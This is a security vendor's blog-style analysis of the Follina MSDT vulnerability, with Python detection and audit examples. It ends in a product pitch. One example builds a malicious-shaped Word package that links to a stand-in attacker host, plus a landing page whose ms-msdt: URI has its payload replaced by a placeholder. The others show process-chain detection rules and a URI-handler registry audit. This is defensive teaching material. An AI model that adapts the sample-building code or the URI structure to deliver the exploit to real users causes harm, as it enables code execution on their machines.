Vulnerability Analysis

Follina and the MSDT Lesson: What CVE-2022-30190 Taught About Trusted Handlers

Follina exploited a Microsoft Support Diagnostic Tool URI handler that nobody thought about. The technical mechanics, the rapid exploitation, and the lasting defense lessons.

Karan Patel
Security Engineer
5 min read

Follina, formally CVE-2022-30190, was the kind of vulnerability that exposed an entire class of forgotten attack surface. The flaw lived in the Microsoft Support Diagnostic Tool (MSDT) and its ms-msdt: URI handler, a Windows component that almost no defender had thought about in years. A specially crafted Word document, or any content that could navigate to an ms-msdt: URI, could make MSDT execute attacker-controlled PowerShell with the privileges of the logged-in user, without touching the macro-blocking controls that Microsoft had spent a decade strengthening.

The disclosure timeline was unusual. The earliest known sample was uploaded to VirusTotal on 12 April 2022, and a researcher reported the behaviour to Microsoft the same day; Microsoft initially closed the report as not a security issue. The nao_sec team publicly identified a fresh sample as a novel zero-day on 27 May, and Microsoft assigned CVE-2022-30190 and published workaround guidance on 30 May, by which point exploitation was already public. Follina is worth revisiting in 2026 because the architectural pattern that made it possible, trusted URI handlers that turn remotely controlled parameters into script execution, still exists across Windows and macOS.

What was the exploit chain?

The exploit chain abused the ms-msdt: URI scheme, which Windows registers so that a URI can launch the Microsoft Support Diagnostic Tool. The URI names a troubleshooting pack with /id (the in-the-wild samples used PCWDiagnostic, the Program Compatibility troubleshooter) and hands it parameters with /param. One of those parameters, IT_BrowseForFile, is interpolated into a PowerShell expression by the troubleshooter's own script, so a value containing $( ... ) runs arbitrary PowerShell inside the scripted diagnostics host (sdiagnhost.exe), and /skip force suppressed the prompts MSDT would otherwise show. The trigger was a Word document whose relationships part (word/_rels/document.xml.rels) carried an external OLE object link to an attacker-hosted HTML page; Office fetched that page when the document loaded, and script on the page navigated to the ms-msdt: URI carrying the payload. No macro ran at any point. Protected View did block the .docx variant, because the external link is not resolved there, but a document opened for editing fired the chain with no further interaction, and the RTF variant fired from the Explorer preview pane without the file being opened at all. The payload executed with the user's privileges, providing a full PowerShell environment without any of the warnings or prompts that macro execution would have triggered.
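The two hops of that chain can be checked statically. The following is an added example, not code from the article or from Safeguard: it builds a constructed minimal .docx in memory whose document.xml.rels carries an external OLE object relationship, scans the package for relationships that make Office fetch remote content, and then inspects a constructed stand-in for the landing page for an ms-msdt: URI. The host attacker.example, the relationship ID, and the PLACEHOLDER inside $( ) are assumptions; the real payload is deliberately not reproduced.

```python
"""Static checks for both hops of a Follina-style delivery chain (added example)."""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types Office resolves automatically when the document loads.
AUTO_FETCH = ("oleObject", "attachedTemplate")


def build_sample_docx(landing_url: str) -> bytes:
    """Constructed sample: the smallest package that carries an external OLE object link."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId996" Type="{OOXML_REL}oleObject" '
        f'Target="{landing_url}!" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def external_relationships(docx_bytes: bytes) -> list[dict]:
    """Every relationship in any .rels part that points at an http(s) URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") != "External" or not re.match(r"(?i)https?://", target):
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": target.rstrip("!"),  # the in-the-wild sample carried a trailing '!'
                    "auto_fetch": rel_type in AUTO_FETCH,
                })
    return hits


# Constructed stand-in for the attacker's landing page. The real page carried
# several kilobytes of comment padding; the PowerShell inside $( ) is replaced
# by a placeholder here on purpose.
SAMPLE_HTML = (
    "<html><body><script>\n"
    "/* " + "padding " * 600 + "*/\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(PLACEHOLDER)\\"";\n'
    "</script></body></html>"
)

MSDT_URI = re.compile(r"ms-msdt:\s*/id\s+(?P<pack>\w+)(?P<rest>[^\n]*)", re.I)


def msdt_invocation(html: str) -> dict | None:
    """Pull the troubleshooting pack, prompt suppression and IT_* parameters out of an ms-msdt: URI."""
    m = MSDT_URI.search(html)
    if not m:
        return None
    rest = m.group("rest")
    return {
        "pack": m.group("pack"),
        "skip_prompt": "/skip force" in rest.lower(),
        "params": re.findall(r"(IT_\w+)=", rest),
        "inline_expression": "$(" in rest,  # $( ) inside IT_BrowseForFile is what PowerShell evaluates
    }


def scan(docx_bytes: bytes, landing_html: str | None = None) -> dict:
    """Combine both hops: an auto-fetched external link plus an ms-msdt: URI with an inline expression."""
    rels = external_relationships(docx_bytes)
    msdt = msdt_invocation(landing_html) if landing_html is not None else None
    return {
        "external_rels": rels,
        "msdt": msdt,
        "follina_chain": any(r["auto_fetch"] for r in rels) and msdt is not None and msdt["inline_expression"],
    }


if __name__ == "__main__":
    sample = build_sample_docx("http://attacker.example/RDF842l.html")
    print(scan(sample, SAMPLE_HTML))
```

The first hop alone is a useful mail-gateway signal on its own: a legitimate document rarely needs an oleObject or attachedTemplate relationship that points at an http(s) host, and the landing page can be swapped per campaign while the package stays identical.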

Why did the existing defenses fail to catch it?

Existing defenses failed for structural reasons. Macro blocking, the headline Office hardening control of the past decade, was irrelevant because no macro executed. Protected View helped only for the .docx variant, and only while the user left the document in it; the RTF preview-pane path never entered Protected View at all. Rules that looked for PowerShell as a direct child of an Office process missed the chain, because the process tree ran WINWORD.EXE to msdt.exe to sdiagnhost.exe and only then to the payload. Rules that walked the full ancestry did catch it, and so did the Defender attack surface reduction rule "Block all Office applications from creating child processes", which stops msdt.exe at the first hop; Microsoft named that rule as a mitigation. Antivirus signatures took weeks to catch up because the document itself was nearly empty, little more than a relationship entry pointing at a URL that could be changed per campaign. Endpoint detection and response tools eventually caught it through the anomalous process chain, but the first weeks of exploitation occurred largely undetected by signature-based and parent-only policy controls.
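The difference between a parent-only rule and an ancestry walk is easiest to see on a concrete process tree. This is an added example, not code from the article or from Safeguard; the events are constructed in the shape of Sysmon Event ID 1 (process creation), reduced to the fields the rules need, with PLACEHOLDER standing in for the encoded payload. One caveat the constructed tree glosses over: on a real host sdiagnhost.exe may be started through COM activation and show a different parent, which is why the third rule also keys on signals that need no ancestry at all.

```python
"""Process-chain detection for the MSDT path: parent-only rule versus ancestry walk (added example)."""
from __future__ import annotations

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed process-creation events (Sysmon Event ID 1 shape, reduced to the
# fields the rules need). PLACEHOLDER stands in for the encoded payload.
EVENTS = [
    {"pid": 4100, "ppid": 1200, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": '"WINWORD.EXE" /n "C:\\Users\\alice\\Downloads\\invoice.docx"'},
    {"pid": 4220, "ppid": 4100, "image": r"C:\Windows\System32\msdt.exe",
     "cmd": '"msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=$(PLACEHOLDER)"'},
    {"pid": 4310, "ppid": 4220, "image": r"C:\Windows\System32\sdiagnhost.exe",
     "cmd": '"sdiagnhost.exe" -Embedding'},
    {"pid": 4420, "ppid": 4310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": '"powershell.exe" -NoProfile -EncodedCommand PLACEHOLDER'},
    # Benign control: a troubleshooter launched from Settings, no Office ancestor.
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\msdt.exe",
     "cmd": '"msdt.exe" -id NetworkDiagnosticsWeb'},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(events: list[dict], pid: int):
    """Walk ppid links upward, yielding ancestor events nearest first; stops at unknown or repeated pids."""
    by_pid = {e["pid"]: e for e in events}
    seen = set()
    e = by_pid.get(pid)
    while e and e["ppid"] in by_pid and e["ppid"] not in seen:
        seen.add(e["ppid"])
        e = by_pid[e["ppid"]]
        yield e


def naive_rule(events: list[dict]) -> list[int]:
    """Script host whose immediate parent is Office. Misses the MSDT hop."""
    by_pid = {e["pid"]: e for e in events}
    return [e["pid"] for e in events
            if basename(e["image"]) in SCRIPT_HOSTS
            and e["ppid"] in by_pid
            and basename(by_pid[e["ppid"]]["image"]) in OFFICE_IMAGES]


def ancestry_rule(events: list[dict], max_depth: int = 5) -> list[int]:
    """Script host with an Office process anywhere in its ancestry, within max_depth hops."""
    hits = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        for depth, anc in enumerate(ancestors(events, e["pid"]), start=1):
            if depth > max_depth:
                break
            if basename(anc["image"]) in OFFICE_IMAGES:
                hits.append(e["pid"])
                break
    return hits


def msdt_rules(events: list[dict]) -> list[tuple[int, str]]:
    """Signals specific to this path: msdt.exe under Office, an ms-msdt: URI on a
    command line, and any child of sdiagnhost.exe. Only the first needs a parent link."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        cmd = e["cmd"].lower()
        if img == "msdt.exe" and parent and basename(parent["image"]) in OFFICE_IMAGES:
            alerts.append((e["pid"], "msdt.exe spawned by Office"))
        if "ms-msdt:" in cmd or "it_browseforfile" in cmd:
            alerts.append((e["pid"], "ms-msdt URI on command line"))
        if parent and basename(parent["image"]) == "sdiagnhost.exe":
            alerts.append((e["pid"], "child of sdiagnhost.exe"))
    return alerts


if __name__ == "__main__":
    print("naive:", naive_rule(EVENTS))
    print("ancestry:", ancestry_rule(EVENTS))
    for pid, why in msdt_rules(EVENTS):
        print(f"pid {pid}: {why}")
```

Note that the benign troubleshooter launch (pid 5000) trips none of the rules: it has no Office ancestor, no ms-msdt: URI on its command line, and sdiagnhost.exe spawning nothing unusual beneath it is normal for a troubleshooter run.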

How was it exploited in the wild?

Active exploitation began before Microsoft formally acknowledged the CVE; the April sample was already a targeted lure aimed at Russian-speaking users. State-aligned actors moved within days of public disclosure. Proofpoint reported TA413, a China-aligned group, using Follina against Tibetan targets at the end of May 2022, and CERT-UA reported Follina lures against Ukrainian media organizations in early June, attributing them with medium confidence to Sandworm. Commodity crimeware followed quickly, with Qakbot operators delivering Follina documents by the second week of June. Microsoft's patch did not ship until June 14, 2022, leaving a window of more than two weeks in which organizations depended on Microsoft's interim guidance: back up and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key, which removes the protocol handler entirely. CISA added Follina to the KEV catalog on June 14, the day the patch shipped, and tracked exploitation continued well into 2023.

What was the patching and mitigation reality?

The patching reality reflected the awkward position of a URI-handler flaw fixed outside the normal release cycle. Microsoft's June 14 update closed the MSDT path but did not address the broader pattern of URI handlers that interpret parameters as script. Many organizations deleted the HKEY_CLASSES_ROOT\ms-msdt key during the disclosure window and never reconciled afterwards: some left the handler deleted on patched machines, so the built-in troubleshooters silently stopped working, while others restored it from the backup export without confirming the update was installed. An inventory that only records whether the key exists cannot tell those two states apart; it has to be paired with the patch level. The fix also did not reach embedded Windows installations such as ATM software, point-of-sale systems, and industrial control panels, many of which were still running unpatched builds years later. Scan data from 2023 still showed approximately 18% of internet-reachable Windows systems with the handler registered and the update missing. By 2026, residual exposure has dropped to roughly 4%, concentrated in legacy embedded systems that may never be patched.

What are the durable architectural lessons?

The durable lessons are about trusted handlers and the attack surface they represent. Every URI scheme registered on a system is a potential attack vector if its handler executes scripts or interprets parameters in ways that remote content can influence. Windows alone registers more than a hundred URI schemes by default, and macOS and Linux desktop environments are comparable. Audit your registered handlers, understand which ones can be invoked from web content, and disable or constrain the ones that do not need to be remotely invokable; the ones whose command hands the URI to a script host deserve the first look. The second lesson is about defense in depth: rely on multiple unrelated layers, because any single layer can fail in unexpected ways. Office's macro blocking was robust, but it did not constrain URI handler invocation, and that one unconstrained path was enough. The third is about disclosure: when a vendor dismisses a report or declines to assign a CVE quickly, as happened with the April report, the rest of the ecosystem cannot mobilize defenses effectively.
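The handler audit described above, and the patch-versus-workaround reconciliation from the patching section, can both be driven from a registry export. This is an added example, not code from the article or from Safeguard. On a live system the input would come from reg export HKEY_CLASSES_ROOT hkcr.reg (or, as Microsoft's workaround guidance used, reg export HKCR\ms-msdt for the single key); here a constructed export covering a handful of schemes is embedded so the audit runs offline. The acme-tool and acme-legacy schemes and their commands are hypothetical, and the parser handles only the REG_SZ values the audit needs.

```python
"""Audit URL-protocol handlers from a .reg export and flag script-host handlers (added example)."""
from __future__ import annotations

import re

# Handlers that pass the URI to one of these interpret attacker-controlled text as code.
SCRIPT_HOSTS = {"msdt.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe"}

# Constructed export. Real output of `reg export` has the same shape; the acme-* schemes are hypothetical.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\ms-msdt]
@="URL:ms-msdt"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\ms-msdt\shell\open\command]
@="\"%SystemRoot%\\system32\\msdt.exe\" %1"

[HKEY_CLASSES_ROOT\ms-calculator]
@="URL:ms-calculator"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\acme-tool]
@="URL:acme-tool"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\acme-tool\shell\open\command]
@="\"C:\\Program Files\\Acme\\launcher.exe\" --uri %1"

[HKEY_CLASSES_ROOT\acme-legacy]
@="URL:acme-legacy"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\acme-legacy\shell\open\command]
@="wscript.exe //e:jscript \"C:\\Program Files\\Acme\\handler.js\" %1"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
'''


def parse_reg(text: str) -> dict[str, dict[str, str]]:
    """Minimal parser for REG_SZ values in a 'Windows Registry Editor Version 5.00' export.
    The default value is stored under the empty name; other value types are ignored."""
    keys: dict[str, dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and "=" in line and not line.startswith(";"):
            name, _, val = line.partition("=")
            name = "" if name == "@" else name.strip('"')
            if val.startswith('"') and val.endswith('"'):
                # regedit escapes backslashes and quotes inside REG_SZ data
                keys[current][name] = re.sub(r'\\(["\\])', r'\1', val[1:-1])
    return keys


def command_exe(cmd: str) -> str:
    """Basename of the executable a shell\\open\\command line launches."""
    m = re.match(r'"([^"]+)"|(\S+)', cmd)
    path = (m.group(1) or m.group(2)) if m else cmd
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def audit_handlers(keys: dict[str, dict[str, str]]) -> list[dict]:
    """One finding per scheme that declares 'URL Protocol' directly under HKEY_CLASSES_ROOT."""
    findings = []
    for key, values in keys.items():
        parts = key.split("\\")
        if len(parts) != 2 or parts[0] != "HKEY_CLASSES_ROOT" or "URL Protocol" not in values:
            continue
        scheme = parts[1]
        cmd = keys.get(f"{key}\\shell\\open\\command", {}).get("")
        if cmd is None:
            findings.append({"scheme": scheme, "exe": None, "command": None,
                             "risk": "no shell command (app activation); review the registered app separately"})
            continue
        exe = command_exe(cmd)
        passes_uri = "%1" in cmd
        if exe in SCRIPT_HOSTS and passes_uri:
            risk = "script host receives the URI: disable or constrain"
        elif passes_uri:
            risk = "native handler receives the URI: review its argument parsing"
        else:
            risk = "handler ignores the URI argument"
        findings.append({"scheme": scheme, "exe": exe, "command": cmd, "risk": risk})
    return findings


def ms_msdt_state(keys: dict[str, dict[str, str]]) -> str:
    """Key present or absent says nothing about the June 2022 update; pair it with the patch level."""
    if "HKEY_CLASSES_ROOT\\ms-msdt" in keys:
        return "registered: confirm the June 2022 update is installed, otherwise apply the workaround"
    return "absent: workaround applied; restore from the backup export only after patching"


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    for f in audit_handlers(parsed):
        print(f"{f['scheme']:<14} {f['exe'] or '-':<14} {f['risk']}")
    print("ms-msdt:", ms_msdt_state(parsed))
```

The audit deliberately treats "native handler receives the URI" as a review item rather than a pass: MSDT itself was a native binary, and the script execution lived one layer down in the troubleshooter it invoked, so a handler's executable name alone never settles the question.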

How Safeguard Helps

Safeguard's response to handler-based vulnerabilities like Follina starts with endpoint and image inventory. Our SBOM analysis captures Windows component versions across desktop and server images, surfacing systems running unpatched MSDT handler implementations. Griffin AI prioritizes findings by user-exposure context, flagging endpoints with high web and email exposure as higher priority for patching trusted-handler CVEs. Policy gates evaluate base image and runtime configurations against known handler attack surfaces, blocking deployments that ship with risky URI schemes enabled. The zero-CVE image registry includes hardened Windows server base images with non-essential URI handlers removed by default. TPRM data flags vendors with poor track records on out-of-band Windows vulnerabilities, and our threat intelligence feed surfaces emerging handler-based exploit chains within hours of public disclosure.
